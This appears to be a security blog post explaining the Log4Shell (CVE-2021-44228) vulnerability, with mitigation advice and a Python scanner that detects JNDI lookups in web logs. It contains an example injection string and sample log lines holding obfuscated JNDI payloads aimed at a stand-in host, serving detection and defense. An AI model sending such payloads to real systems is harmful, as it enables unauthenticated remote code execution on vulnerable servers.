Zero-Day Exploits: Log4J
Log4j, also referred to as "Log4Shell," is a severe, critical zero-day vulnerability in the widely used Java logging library Apache Log4j, which ships in many software solutions including Apache products, Apple iCloud, Minecraft and others. It is easy to exploit and enables attackers to gain unauthenticated remote code execution, install crypto miners, deploy botnet services, and so on.
"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC" according to Cloudflare CEO Matthew Prince.
The zero-day vulnerability is triggered when a specially crafted string, supplied by a malicious actor through any of several input vectors, is processed by the Log4j component. The string contains "jndi", which refers to the Java Naming and Directory Interface. A protocol such as "ldap", "ldaps", "rmi", "dns", "iiop" or "http" precedes the attacker's domain.
What is the Apache Log 4j2 JNDI Vulnerability?
From the NIST National Vulnerability Database: "Apache Log4j2 <=2.14.1 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default."
An example of the attack string would be:
${jndi:ldap://[malicious site]/<script>}
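The string above is what defenders look for in web server and application logs. The following Python scanner is an added example, not code from the original post: it flags JNDI lookups for the protocols listed earlier, after undoing the URL-encoding and nested-lookup obfuscation (for instance ${${lower:j}ndi:...}) that scanners used to evade naive string matching. The access-log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Protocols the text lists as preceding the attacker-controlled host.
JNDI_PROTOCOLS = ("ldap", "ldaps", "rmi", "dns", "iiop", "http")

# Innermost lookups commonly used to hide the literal "jndi":
# ${lower:j}, ${upper:J}, ${::-j}, ${env:NOPE:-j} (default-value syntax).
_INNER = re.compile(r"\$\{(?:(lower|upper):([^${}]*)|(?:[^${}:]*:)*-([^${}]*))\}", re.I)
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(" + "|".join(JNDI_PROTOCOLS) + r")\s*:", re.I)

def _resolve(m):
    # Evaluate one innermost lookup the way Log4j would, so the hidden text emerges.
    kind = (m.group(1) or "").lower()
    if kind == "lower":
        return m.group(2).lower()
    if kind == "upper":
        return m.group(2).upper()
    return m.group(3)  # ${...:-x} evaluates to its default value x

def normalize(line):
    """URL-decode and collapse nested lookups until the string stops changing."""
    prev = None
    while prev != line:
        prev = line
        line = _INNER.sub(_resolve, unquote(line))
    return line

def find_jndi(line):
    """Return the JNDI protocol found in a log line, or None if the line is clean."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None

def scan(lines):
    """Return (line_index, protocol) for each line carrying a JNDI lookup."""
    return [(i, p) for i, l in enumerate(lines) if (p := find_jndi(l))]

# Constructed Combined Log Format lines (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.7/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 612 "-" "%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F203.0.113.7%2Fc%7D"',
]

if __name__ == "__main__":
    for idx, proto in scan(SAMPLE_LOG):
        print(f"line {idx}: JNDI lookup via {proto} -> {normalize(SAMPLE_LOG[idx])}")
```

The normalizer handles the case-conversion and default-value lookups only; other lookup types exist and a production detector should be kept current with the evasions observed in your own traffic.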
"The bulk of attacks that Microsoft has observed at this time has been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers." according to the Microsoft 365 Defender Threat Intelligence Team.
The vulnerability has been scored 10, the highest possible rating, on the CVSS scale.
What are the mitigation or remediation techniques?
It is important to upgrade Apache Log4j from version 2.14.1 to version 2.15.0 immediately, or as soon as possible.
As of today, the latest version is 2.16.0, which disables JNDI by default.
Huntress Labs has created a tool to help you test whether your applications are vulnerable to CVE-2021-44228. "Please note that this tool is intended for testing purposes only and should only be used on systems you're authorized to test. If you find any vulnerabilities, please follow responsible disclosure guidelines." Link to the tool.
NCSC-NL maintains a compiled Log4j resource list on GitHub.